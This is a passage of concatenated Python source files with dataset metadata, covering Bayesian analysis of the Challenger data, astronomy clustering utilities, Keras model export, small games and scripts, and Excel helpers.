{0}'.format(os.path.join(curDir, outFile)))\n \nplt.show()\n\n# --- Perform the MCMC-simulations ---\ntemperature = challenger_data[:, 0]\nD = challenger_data[:, 1] # defect or not?\n\n# Define the prior distributions for alpha and beta\n# 'value' sets the start parameter for the simulation\n# The second parameter for the normal distributions is the \"precision\",\n# i.e. the inverse of the standard deviation\nbeta = pm.Normal(\"beta\", 0, 0.001, value=0)\nalpha = pm.Normal(\"alpha\", 0, 0.001, value=0)\n\n# Define the model-function for the temperature\n@pm.deterministic\ndef p(t=temperature, alpha=alpha, beta=beta):\n return 1.0 / (1. + np.exp(beta * t + alpha))\n\n# connect the probabilities in `p` with our observations through a\n# Bernoulli random variable.\nobserved = pm.Bernoulli(\"bernoulli_obs\", p, value=D, observed=True)\n\n# Combine the values to a model\nmodel = pm.Model([observed, beta, alpha])\n\n# Perform the simulations\nmap_ = pm.MAP(model)\nmap_.fit()\nmcmc = pm.MCMC(model)\nmcmc.sample(120000, 100000, 2)\n\n# --- Show the resulting posterior distributions ---\nalpha_samples = mcmc.trace('alpha')[:, None] # best to make them 1d\nbeta_samples = mcmc.trace('beta')[:, None]\n\nplt.figure(figsize=(12.5, 6))\n\n# histogram of the samples:\nplt.subplot(211)\nplt.title(r\"Posterior distributions of the variables $\\alpha, \\beta$\")\nplt.hist(beta_samples, histtype='stepfilled', bins=35, alpha=0.85,\n label=r\"posterior of $\\beta$\", color=\"#7A68A6\", normed=True)\nplt.legend()\n\nplt.subplot(212)\nplt.hist(alpha_samples, histtype='stepfilled', bins=35, alpha=0.85,\n label=r\"posterior of $\\alpha$\", color=\"#A60628\", normed=True)\nplt.legend()\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_Parameters.png'\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n\nplt.show()\n\n# --- Show the probability curve ----\n# Draw the probability as a function of time\nt = np.linspace(temperature.min() - 5, temperature.max() + 5, 50)[:, None]\np_t = logistic(t.T, beta_samples, alpha_samples)\n\nmean_prob_t = p_t.mean(axis=0)\n\nplt.figure(figsize=(12.5, 4))\n\nplt.plot(t, mean_prob_t, lw=3, label=\"average posterior \\nprobability \\\nof defect\")\nplt.plot(t, p_t[0, :], ls=\"--\", label=\"realization from posterior\")\nplt.plot(t, p_t[-2, :], ls=\"--\", label=\"realization from posterior\")\nplt.scatter(temperature, D, color=\"k\", s=50, alpha=0.5)\nplt.title(\"Posterior expected value of probability of defect; \\\nplus realizations\")\nplt.legend(loc=\"lower left\")\nplt.ylim(-0.1, 1.1)\nplt.xlim(t.min(), t.max())\nplt.ylabel(\"probability\")\nplt.xlabel(\"temperature\")\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_Probability.png'\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n\nplt.show()\n\n# --- Draw CIs ---\nfrom scipy.stats.mstats import mquantiles\n\n# vectorized bottom and top 2.5% quantiles for \"confidence interval\"\nqs = mquantiles(p_t, [0.025, 0.975], axis=0)\nplt.fill_between(t[:, 0], *qs, alpha=0.7,\n color=\"#7A68A6\")\n\nplt.plot(t[:, 0], qs[0], label=\"95% CI\", color=\"#7A68A6\", alpha=0.7)\n\nplt.plot(t, mean_prob_t, lw=1, ls=\"--\", color=\"k\",\n label=\"average posterior \\nprobability of defect\")\n\nplt.xlim(t.min(), t.max())\nplt.ylim(-0.02, 1.02)\nplt.legend(loc=\"lower left\")\nplt.scatter(temperature, D, color=\"k\", s=50, alpha=0.5)\nplt.xlabel(\"temp, $t$\")\n\nplt.ylabel(\"probability 
estimate\")\nplt.title(\"Posterior probability estimates given temp. $t$\")\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_CIs.png'\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n\nplt.show()","sub_path":"Code3/challenger.py","file_name":"challenger.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"122904692","text":"def convert_values(self, value, field):\n \"\"\"Coerce the value returned by the database backend into a consistent type that\n is compatible with the field type.\n \"\"\"\n internal_type = field.get_internal_type()\n if internal_type == 'DecimalField':\n return value\n elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':\n return int(value)\n elif internal_type in ('DateField', 'DateTimeField', 'TimeField', 'CharField', 'EmailField', 'SlugField',\n 'URLField'):\n return value\n # No field, or the field isn't known to be a decimal or integer\n # Default to a float\n return float(value)\n","sub_path":"monkey/django.py","file_name":"django.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"31532894","text":"# Various old disused codes from galcentricutils.\ndef GALCENT_to_ICRS(self, hdfdir, hdfname, group, set):\n # Set up utilities environment for radec conversion\n utilities = utils()\n # Set up HDF and grab table, and SkyCoord objects for all targets.\n writer = hdfutils.hdf5_writer(hdfdir, hdfname)\n table = writer.read_table(group, set)\n skycoords = coord.SkyCoord(x=table['x'] * u.kpc, y=table['y'] * u.kpc, z=table['z'] * u.kpc,\n v_x=table['vx'] * u.km/u.s, v_y=table['vy']*u.km/u.s, v_z=table['vz']*u.km/u.s,\n frame=\"galactocentric\")\n # Effect conversion to ICRS, work through objects, collect converted quantities.\n icrs_skycoords = skycoords.transform_to(coord.ICRS)\n ra_list, dec_list, pmra_list, pmdec_list, distance_list, radial_velocity_list = [],[],[],[],[],[]\n textradeclist = []\n for object in icrs_skycoords:\n ra, dec, pmra_cosdec, pmdec, distance, radial_velocity = object.ra/u.deg, \\\n object.dec/u.deg, \\\n object.pm_ra_cosdec / (u.mas * u.yr), \\\n object.pm_dec / (u.mas * u.yr), \\\n object.distance / u.kpc, \\\n object.radial_velocity / (u.km / u.s)\n # Discard the dimensionless unit.\n ra, dec, pmra_cosdec, pmdec, distance, radial_velocity = ra.value, dec.value, \\\n pmra_cosdec.value, pmdec.value, \\\n distance.value, radial_velocity.value\n # Remove cosdec, append to list\n pmra = pmra_cosdec / math.cos(math.radians(dec))\n # Grab text values\n radec = [ra,dec]\n textradec = utilities.deg_radec(radec)\n textradeclist.append(textradec)\n ra_list.append(ra), dec_list.append(dec), pmra_list.append(pmra), pmdec_list.append(pmdec), \\\n distance_list.append(distance), radial_velocity_list.append(radial_velocity)\n\n # Modify and save table.\n table['textradec'] = np.array(textradeclist)\n table['ra'] = ra_list\n table['dec'] = dec_list\n table['pmra'] = pmra_list\n table['pmdec'] = pmdec_list\n table['dist'] = distance_list\n table['vlos'] = radial_velocity_list\n writer.write_table(group, set, table)\ndef ICRS_to_GALCENT(self, hdfdir, hdfname, group, set):\n # Set up HDF and grab table, and SkyCoord objects for all targets.\n writer = hdfutils.hdf5_writer(hdfdir, hdfname)\n table = writer.read_table(group, set)\n skycoords = 
coord.SkyCoord(ra=table['ra']*u.deg,\n dec=table['dec']*u.deg,\n distance=table['dist']*u.kpc,\n pm_ra_cosdec=table['pmra']*np.cos(np.deg2rad(table['dec']))*u.mas/u.yr,\n pm_dec=table['pmdec']*u.mas/u.yr,\n radial_velocity=table['vlos']*u.km/u.s,\n frame=\"icrs\")\n # Effect conversion to Galactocentric, work through objects, collect converted quantities.\n galcent_skycoords = skycoords.transform_to(coord.Galactocentric)\n x_list, y_list, z_list, vx_list, vy_list, vz_list = [], [], [], [], [], []\n for object in galcent_skycoords:\n x,y,z,vx,vy,vz = object.x/u.kpc, object.y/u.kpc, object.z/u.kpc, \\\n object.v_x/(u.km/u.s), object.v_y/(u.km/u.s), object.v_z/(u.km/u.s)\n # Discard the dimensionless unit.\n x,y,z,vx,vy,vz = x.value,y.value,z.value,vx.value,vy.value,vz.value\n\n # Append to list\n x_list.append(x), y_list.append(y), z_list.append(z), \\\n vx_list.append(vx), vy_list.append(vy), vz_list.append(vz)\n\n # Modify and save table.\n table['x'],table['y'],table['z'],table['vx'],table['vy'],table['vz'] = x_list,y_list,z_list,\\\n vx_list,vy_list,vz_list\n writer.write_table(group, set, table)\ndef vec_ICRS_to_GALCENT(self, ra,dec,distance,dmura,dmudec,vlos):\n vecskycoord = coord.SkyCoord(ra=ra*u.deg,\n dec=dec*u.deg,\n distance=distance*u.kpc,\n pm_ra_cosdec=dmura*np.cos(np.radians(dec))*u.mas/u.yr,\n pm_dec=dmudec*u.mas/u.yr,\n radial_velocity=vlos*u.km/u.s,\n frame=\"icrs\")\n vecskycoord = vecskycoord.transform_to(coord.Galactocentric)\n x,y,z,vx,vy,vz = vecskycoord.x/u.kpc, vecskycoord.y/u.kpc, vecskycoord.z/u.kpc, \\\n vecskycoord.v_x/(u.km/u.s), vecskycoord.v_y/(u.km/u.s), vecskycoord.v_z/(u.km/u.s)\n x,y,z,vx,vy,vz = x.value,y.value,z.value,vx.value,vy.value,vz.value\n return [x,y,z,vx,vy,vz]\n\n# Clustering\nclass cluster3d(object):\n def __init__(self):\n self.null = \"null\"\n\n # Remove outlying L-values (units of sigma). Assumes r has already been cleaned out (see: gcc_table)\n def clean(self, table, sig_tolerance):\n\n Ls = [table['Lx'],table['Ly'],table['Lz']]\n mean_L, std_L = np.array([np.mean(d) for d in Ls]),np.array([np.std(d) for d in Ls])\n table_cleaned = table\n for num,row in enumerate(table):\n L = np.array([row['Lx'],row['Ly'],row['Lz']])\n L_dif = L - mean_L\n mag_L_dif = np.array([abs(d) for d in L_dif])\n sig_L_dif = mag_L_dif/std_L\n for i in sig_L_dif:\n if i >= sig_tolerance:\n table_cleaned.remove_row(num)\n break\n return table_cleaned\n\n # kmeans-cluster the given table: returns the inertia of the table, too.\n def kmeans(self, table, k, savedex, browser):\n # Set up vectors/positions/etc\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n km = KMeans(n_clusters=k,n_init=10,max_iter=300,algorithm=\"full\")\n kmfit = km.fit_predict(L) # list with indices for cluster\n inertia = km.inertia_\n table['k_index'] = np.array(kmfit)\n graphutils.threed_graph().kmeans_L(table, savedex + \".html\", browser)\n return table, inertia\n\n # DBSCAN. 
params are \"eps\" and \"min_samples.\" Browser=True opens in browser (append to others.)\n def dbs(self, table, eps, min_samples, browser):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n dbs = DBSCAN(eps=eps, min_samples=min_samples, metric=\"l1\", leaf_size=5)\n dbsfit = dbs.fit_predict(L)\n table['k_index'] = np.array(dbsfit)\n save_format = (\"DBS_TEST_EPS{0}_MINSAMP{1}\" + \".html\").format(eps, min_samples)\n graphutils.threed_graph().kmeans_L(table, save_format, browser)\n return table, dbs\n\n # Hierarchical DBS\n def hdbs(self, table, browser):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n hdbs = hdbscan.HDBSCAN(min_cluster_size=25,\n min_samples=15,\n metric=\"l2\")\n hdbsfit = hdbs.fit_predict(L)\n table['k_index'] = np.array(hdbsfit)\n #save_format = (\"HDBS_TEST_EPS{0}_MINSAMP{1}\" + \".html\").format(eps, min_samples)\n graphutils.threed_graph().kmeans_L(table, \"test_hdbs.html\", browser)\n graphutils.threed_graph().xmeans_L(table, \"test_hdbs.html\", browser)\n return table\n\n # OPTICS\n def optics(self, table):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n optics = OPTICS(metric=\"l1\", min_cluster_size=20, leaf_size=20, eps=1e4, max_eps=1e6)\n opticsfit = optics.fit_predict(L)\n table['k_index'] = np.array(opticsfit)\n graphutils.threed_graph().kmeans_L(table, \"test_plot\", False)\n return table\n\n # Agglomerative\n def aglom(self, table, k):\n table = self.clean(table,5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n aglom = AgglomerativeClustering(n_clusters=k, linkage='ward')\n aglomfit = aglom.fit_predict(L)\n table['k_index'] = np.array(aglomfit)\n graphutils.threed_graph().kmeans_L(table, \"test_plot\", False)\n return table\n\n # Affinity Propagation\n def afprop(self, table):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n afprop = AffinityPropagation(damping=0.5)\n afpropfit = afprop.fit_predict(L)\n table['k_index'] = np.array(afpropfit)\n graphutils.threed_graph().kmeans_L(table, False, True)\n return table\n\n # Gaussian Mixture with Variational Bayes\n def bayesgaussmix(self, table, k, savedex, browser):\n # Set up vectors/positions/etc\n table = self.clean(table, 4)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n gm = BayesianGaussianMixture(n_components=k)\n gmfit = gm.fit_predict(L) # list with indices for cluster\n table['k_index'] = np.array(gmfit)\n graphutils.threed_graph().kmeans_L(table, savedex + \".html\", browser)\n return table\n\n # Gaussian Mixture - Euclidean\n def gaussmix(self, table, k, savedex, browser, graph):\n # Set up vectors/positions/etc\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n gm = GaussianMixture(n_components=k)\n gmfit = gm.fit_predict(L) # list with indices for cluster\n table['k_index'] = np.array(gmfit)\n if graph == True:\n graphutils.threed_graph().kmeans_L(table, savedex + \".html\", browser)\n bic, aic = gm.bic(L), gm.aic(L)\n return table, bic, aic\n\n # Grab aics/bics for varioues values of (k) for table.\n def gaussaicsbics(self, table, k_max, savedex):\n y = np.arange(1, k_max, 1)\n bics, aics = [], []\n for i in y:\n gmeansdone = self.gaussmix(table, i, \"test\", browser=False, graph=False)\n bics.append(gmeansdone[1]), aics.append(gmeansdone[2])\n plt.plot(y, bics, color=\"red\", label=\"bics\")\n plt.plot(y, aics, color=\"green\", label=\"aics\")\n plt.legend()\n 
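# Make sure the image output directory exists before saving the AIC/BIC plot.\n        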
try:\n os.mkdir(windows_directories.imgdir + \"\\\\gauss_aics_bics_test\")\n except:\n pass\n\n plt.savefig(windows_directories.imgdir + \"\\\\gauss_aics_bics_test\\\\\" + savedex + \".png\")\n plt.clf()\n plt.close()\n","sub_path":"master-streams/deprecated/DEPRECATED_galcentricutils.py","file_name":"DEPRECATED_galcentricutils.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"381775511","text":"__author__ = 'mikhail'\nimport pickle\nimport indicoio\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\n\n\nclass Clf:\n clf = RandomForestClassifier(n_estimators=25, n_jobs = -1)\n flag = False\n memory = {}\n\n def __init__(self, filepath=\"/home/mikhail/PycharmProjects/JustCodeItHackathon/cgi-bin/ser.txt\"):\n with open(filepath,\"rb\") as f:\n Clf.memory = pickle.load(f)\n self.filepath = filepath\n\n X = Clf.memory['X']\n Y = Clf.memory['Y']\n if X.shape[0] != 0:\n flag = True\n Clf.clf.fit(X,Y)\n\n def dump(self):\n with open(self.filepath, \"wb\") as f:\n pickle.dump(Clf.memory, f )\n\n def getEmotion(self, url):\n indicoio.config.api_key = 'd6128b058d220992aa435762eeb81651'\n\n temp = indicoio.fer(url).values()\n X = np.array(temp)\n return X\n\n def predict(self, X):\n if not Clf.flag:\n return 1\n return Clf.clf.predict(X)\n\n def add(self,X, Y):\n with open(self.filepath,\"rb\") as f:\n Clf.memory['X'] = np.vstack((Clf.memory['X'], X))\n Clf.memory['Y'] = np.vstack((Clf.memory['Y'], Y))\n\n","sub_path":"cgi-bin/Clf.py","file_name":"Clf.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"130358279","text":"from PIL import Image\nfrom numpy import linalg\nimport json\ndataPath = r'F:/SWrk/gpTasks/data/originData/'\nresultPath = r'F:/SWrk/gpTasks/data/resources/'\nDefValNumpy = ['0', '1', '2', '3', '4', '5', '6', '7', '-', 'p']\nDefDir = {}\n\n\ndef get_hash(img):\n img_L = img.convert(\"L\")\n pixels = list(img_L.getdata())\n for p in range(0, len(pixels)):\n if pixels[p] is 192 or pixels[p] is 128:\n pixels[p] = 0\n else:\n pixels[p] = 1\n return pixels\n\n\ndef get_sparseMatrix(pixels):\n tempDoubleList = []\n for i in range(0, 16):\n tempList = pixels[(i*16):((i+1)*16)]\n tempDoubleList.append(tempList)\n return tempDoubleList\n\n\ndef get_maxEigvals(img):\n # matrix = get_sparseMatrix(get_hash(img))\n return max(linalg.eigvals(get_sparseMatrix(get_hash(img))))\n # emmm 好奇葩的特征值...\n # return linalg.eigvals(matrix)\n\n\ndef get_code(maxEigvals):\n return DefDir[str(maxEigvals)]\n\n\n# # 创建模板特征值存储的json文件时用到\n# for ietm in range(0, len(DefValNumpy)):\n# img_1 = Image.open(dataPath+DefValNumpy[ietm]+\".png\")\n# DefDir[ietm] = str(get_maxEigvals(img_1))\n# jsObj = json.dumps(DefDir)\n# # print(jsObj)\n# with open((dataPath+'DefMaxEigvals.josn').encode('utf-8'), \"w\") as ftemp:\n# ftemp.write(jsObj)\n\n# 从文件获取模板图片的特征值存入字典 \nwith open((dataPath+'DefMaxEigvals.josn').encode('utf-8'), \"r\") as ftemp:\n DefDir = json.load(ftemp)\nfor item in DefDir:\n DefDir[item] = complex(DefDir[item])\nprint(DefDir)\n ","sub_path":"Task5/cheB_back.py","file_name":"cheB_back.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"539285815","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded 
file name: D:\\BuildAgent\\work\\test/iobjectspy/ml\\vision\\_models\\semantic_seg\\base_keras_models.py\n# Compiled at: 2019-12-31 04:09:04\n# Size of source mod 2**32: 9072 bytes\n\"\"\"\n@author: YangRuijie\n@license: \n@contact: yangruijie@supermap.com\n@software: \n@file: base_models.py\n@time: 7/23/19 6:49 AM\n@desc:\n\"\"\"\nimport os, time\nfrom collections import OrderedDict\nimport numpy as np, tensorflow as tf\nfrom keras.callbacks import TensorBoard, ModelCheckpoint\nfrom tensorflow import Tensor\nfrom tensorflow.python.saved_model import tag_constants\nfrom tensorflow.python.saved_model.signature_def_utils_impl import predict_signature_def\nimport tensorflow.python.saved_model as saved_model_builder\nfrom keras import backend as K\nfrom toolkit._keras_model_utils import ModelCheckpointLatest\nfrom ....._logger import log_warning, log_info\nfrom toolkit._toolkit import save_config_to_yaml\n\nclass Estimation:\n\n def __init__(self, model_path, config):\n if not isinstance(model_path, str):\n raise TypeError('model_path data type inappropriate ,should be str ')\n if not os.path.exists(model_path):\n raise Exception('model_path path not exists')\n self.model_path = model_path\n self.sess = None\n self.tf_inputs = None\n self.tf_outputs = None\n self.load_model(model_path)\n\n def estimate_img(self):\n pass\n\n def estimate_tile(self):\n pass\n\n def load_model(self, model_path):\n self.model_path = model_path\n self.sess = tf.Session()\n self.meta_graph_def = tf.saved_model.loader.load(self.sess, ['serve'], model_path)\n self.signature = self.meta_graph_def.signature_def\n self.sess.graph.finalize()\n\n def close_model(self):\n \"\"\"\n 关闭模型\n :return:\n \"\"\"\n self.sess.close()\n tf.reset_default_graph()\n\n def _predict_tile_local(self, predict_tile, out_shape):\n \"\"\"\n 利用给定的模型使用tensorflow推断得到模型预测结果\n :param predict_tile: ndarray 需要预测的数组片 形状为 (tile_nums,:) 即第一列为图片的数量\n :param out_shape: tuple 输出结果的形状 如(100,320,320,1)\n :return: ndarray 返回预测的结果\n \"\"\"\n x_tensor_name = self.signature['predict'].inputs['images'].name\n y_tensor_name = self.signature['predict'].outputs['scores'].name\n x = self.sess.graph.get_tensor_by_name(x_tensor_name)\n y = self.sess.graph.get_tensor_by_name(y_tensor_name)\n self.sess.graph.finalize()\n batch_size = 1\n total_batch = int(predict_tile.shape[0] / batch_size)\n for i in range(total_batch):\n out = self.sess.run(y, feed_dict={x: predict_tile[i * batch_size:(i + 1) * batch_size, :]})\n if i == 0:\n y_all = out\n else:\n y_all = np.concatenate((y_all, out), 0)\n\n y_out = np.expand_dims(y_all, axis=0)\n y_out.resize(out_shape)\n return y_out\n\n\nclass Trainer:\n\n def __init__(self):\n self.callbacks = []\n self.loss = []\n self.acc = []\n self.val_loss = []\n self.val_acc = []\n self.model_type = ''\n self.model_architecture = ''\n\n def init_callbacks(self, log_path=None):\n if log_path:\n self.config.trainer.callbacks.tensorboard_log_dir = os.path.join(log_path, time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'logs')\n self.config.trainer.callbacks.checkpoint_dir = os.path.join(log_path, time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'checkpoints')\n else:\n self.log_path = 'experiments'\n self.config.trainer.callbacks.tensorboard_log_dir = os.path.join('experiments', time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'logs')\n self.config.trainer.callbacks.checkpoint_dir = os.path.join('experiments', time.strftime('%Y-%m-%d', time.localtime()), 
self.config.application.name, 'checkpoints')\n if os.path.exists(self.config.trainer.callbacks.tensorboard_log_dir) is not True:\n os.makedirs(self.config.trainer.callbacks.tensorboard_log_dir)\n if os.path.exists(self.config.trainer.callbacks.checkpoint_dir) is not True:\n os.makedirs(self.config.trainer.callbacks.checkpoint_dir)\n self.callbacks.append(ModelCheckpoint(filepath=(os.path.join(self.config.trainer.callbacks.checkpoint_dir, '%s-{epoch:04d}-{val_loss:.4f}.hdf5' % self.config.application.name)),\n monitor=(self.config.trainer.callbacks.checkpoint_monitor),\n mode=(self.config.trainer.callbacks.checkpoint_mode),\n save_best_only=(self.config.trainer.callbacks.checkpoint_save_best_only),\n save_weights_only=(self.config.trainer.callbacks.checkpoint_save_weights_only),\n verbose=(self.config.trainer.callbacks.checkpoint_verbose)))\n self.callbacks.append(ModelCheckpointLatest(self.config.trainer.callbacks.checkpoint_dir))\n self.callbacks.append(TensorBoard(log_dir=(self.config.trainer.callbacks.tensorboard_log_dir),\n write_graph=(self.config.trainer.callbacks.tensorboard_write_graph)))\n\n def train(self):\n pass\n\n def _save_tfserving_model(self, model, out_path, export_version=None):\n \"\"\"\n save tfserving model\n :param model: keras model\n :param out_path:\n :param export_version:\n :return:\n \"\"\"\n K.set_learning_phase(0)\n with tf.device('/cpu:0'):\n new_model = model\n export_base_path = out_path\n if export_version is None:\n export_path = export_base_path\n else:\n export_path = os.path.join(export_base_path, str(export_version))\n while os.path.exists(export_path):\n export_path += '_1'\n\n builder = saved_model_builder.SavedModelBuilder(export_path)\n if not isinstance(new_model.input, Tensor):\n signature = predict_signature_def(inputs={'images' + str(i):input for i, input in enumerate(new_model.input)}, outputs={'scores': new_model.output})\n ModelinputputJson = [{'shape':input.shape.as_list()[1:], 'type':input.dtype.name, 'inputs':'images' + str(i)} for i, input in enumerate(new_model.input)]\n else:\n ModelinputputJson = [{'shape':new_model.input.shape.as_list()[1:], \n 'type':new_model.input.dtype.name, 'inputs':'images'}]\n signature = predict_signature_def(inputs={'images': new_model.input}, outputs={'scores': new_model.output})\n with K.get_session() as (sess):\n builder.add_meta_graph_and_variables(sess=sess, tags=[\n tag_constants.SERVING],\n signature_def_map={'predict': signature})\n builder.save()\n base_name = os.path.basename(export_path)\n config = OrderedDict({'model_type':self.model_type, \n 'framework':'keras', \n 'model_architecture':self.model_architecture, \n 'model_categorys':base_name, \n 'tile_size':self.tile_size, \n 'model_tag':'standard', \n 'signature_name':'predict', \n 'model_input':ModelinputputJson, \n 'model_output':[\n {'shape':new_model.output.shape.as_list()[1:], \n 'type':new_model.output.dtype.name, 'outputs':'scores'}], \n 'class_type':[OrderedDict(l.toDict()) for l in list(self.class_type)], \n 'is_stretch':0, \n 'batch_size':1})\n model_path = os.path.join(export_path, str(base_name) + '.sdm')\n save_config_to_yaml(config, model_path)\n log_info('model saved in dir : {}'.format(model_path))\n print('model saved in dir : {}'.format(model_path))","sub_path":"pycfiles/iobjectspy-10.0.1.0.tar/base_keras_models.py","file_name":"base_keras_models.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"276229482","text":"from random 
import randint\nprint(\"Hello, the game begins!\\nGuess a number between 0 and 20\")\nnumber = randint(0,20)\nattempt = 3\ndef trying():\n\ttry:\n\t\tglobal attempt\n\t\tuserNumber = input(\"Number: \")\n\t\tif int(userNumber) == number:\n\t\t\tprint(\"You win!\")\n\t\telif int(userNumber) > number and attempt > 1:\n\t\t\tattempt = attempt - 1\n\t\t\tprint(\"You have \" + str(attempt) + \" attempts\")\n\t\t\tprint(\"Try a smaller number\")\n\t\t\ttrying()\n\t\telif int(userNumber) < number and attempt > 1:\n\t\t\tattempt = attempt - 1\n\t\t\tprint(\"You have \" + str(attempt) + \" attempts\")\n\t\t\tprint(\"Try a bigger number\")\n\t\t\ttrying()\n\t\telse:\n\t\t\tprint(\"Game over\\nThe number is \",number)\n\texcept ValueError:\n\t\tprint(\"ERROR. Try again please\")\n\t\ttrying()\ntrying()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"587920008","text":"import sys\n\ndef main():\n    n = int(raw_input())\n    a = {'one': 1}\n    for i in xrange(n):\n        st = raw_input()\n        st = st.split()\n        a[st[0]] = (float(st[1]) + float(st[2]) + float(st[3]))/3\n    ans = raw_input()\n    print(\"{:.2f}\\n\".format(a[ans]))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Miscellaneous/Python Tutorials/Finding the percentage/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"133761979","text":"# Call Back\n\nimport time\nimport pigpio\nimport os\nimport sys\n\nif (1 < len(sys.argv)):\n\tMYFILEPATH = str(sys.argv[1])\nelse:\n\t# Put location of your random-time output file here\n\tMYFILEPATH = 'randtimegeiger.txt'\n\n# Strip off previously used file from string\nMYFILEPATH_ID = MYFILEPATH.split (\"/\")[-1]\nMYFILEPATH_ID = MYFILEPATH[:(len(MYFILEPATH) - len(MYFILEPATH_ID))]\n\n# Process ID code\npid = os.getpid()\nfPid = open(MYFILEPATH_ID + \"pid.txt\", 'w')\nfPid.write(str(pid))\nfPid.close()\n\nfo = open(MYFILEPATH,'a')\n\n# Call Back Function\ndef mycb(x, y, z):\n\tt=time.time()\n\t#print t\n\tfo.write(str(t) + '\\n')\n\tfo.flush()\n\n# Setup Call Back\npin=pigpio.pi()\ncb=pin.callback(23, pigpio.FALLING_EDGE, mycb)\n\n# Sleep and collect times\nwhile 1:\n\ttime.sleep(1000)\n","sub_path":"Mike/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202031569","text":"import pandas as pd\n\ndef PDReadExcel(fPath):\n    with pd.ExcelFile(fPath) as xlsF:\n        # Print the sheet names found in the excel file\n        print(xlsF.sheet_names)\n        # table1 = xlsF.parse('first_sheet')\n        # table2 = xlsF.parse('second_sheet')\n\n        # data1 = pd.read_excel(xlsF)\n        # print(data1)\n\n\ndef PDWriteExcel(df, fPath):\n    # df is a DataFrame\n    EW = pd.ExcelWriter(fPath)\n    df.to_excel(EW, sheet_name='data')\n    EW.save()\n\nif __name__ == '__main__':\n    PDReadExcel('Quant/util/test.xlsx')\n","sub_path":"libs/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"564915004","text":"__version__ = \"1.0.0\"\n__version_info__ = (1, 0, 0)\n__license__ = \"Unlicense\"\n__author__ = 'Gu Jianzhong '\n\nimport re , sys\ntry:\n    import ujson as json # Speedup if present; no big deal if not\nexcept ImportError:\n    import 
json\n\n#\n# this function is copied from json_cleaner.py\n# https://gist.github.com/liftoff/ee7b81659673eca23cd9fc0d8b8e68b7\n#\ndef remove_trailing_commas(json_like):\n \"\"\"\n Removes trailing commas from *json_like* and returns the result. Example::\n\n >>> remove_trailing_commas('{\"foo\":\"bar\",\"baz\":[\"blah\",],}')\n '{\"foo\":\"bar\",\"baz\":[\"blah\"]}'\n \"\"\"\n trailing_object_commas_re = re.compile(\n r'(,)\\s*}(?=([^\"\\\\]*(\\\\.|\"([^\"\\\\]*\\\\.)*[^\"\\\\]*\"))*[^\"]*$)')\n trailing_array_commas_re = re.compile(\n r'(,)\\s*\\](?=([^\"\\\\]*(\\\\.|\"([^\"\\\\]*\\\\.)*[^\"\\\\]*\"))*[^\"]*$)')\n # Fix objects {} first\n objects_fixed = trailing_object_commas_re.sub(\"}\", json_like)\n # Now fix arrays/lists [] and return the result\n return trailing_array_commas_re.sub(\"]\", objects_fixed)\n\nwith open('crossbar.conf','r') as f:\n s = f.read()\n f.close()\n conf=json.loads(remove_trailing_commas(s))\n\n#print(conf.keys())\n#sys.exit(0)\n\nimport openpyxl\nwb = openpyxl.Workbook(write_only=True)\nfor tbl in conf.keys():\n wb.create_sheet(title=tbl)\n sheet = wb[tbl]\n heads = list(conf[tbl][0].keys())\n #print(heads)\n sheet.append(heads)\n for row in conf[tbl]:\n sheet.append(list(row.values()))\nwb.save('auto-conf.xlsx')\n\n#for tag in conf.keys():\n# print('****' + tag + ':')\n# for ele in conf[tag]:\n# if tag == 'crossbar-connects':\n# print(','.join(str(x) for x in [ele['id'],ele['sourceIdx'],ele['zoneIdx'],ele['sinkIdx']]))\n# else:\n# print(','.join(str(x) for x in 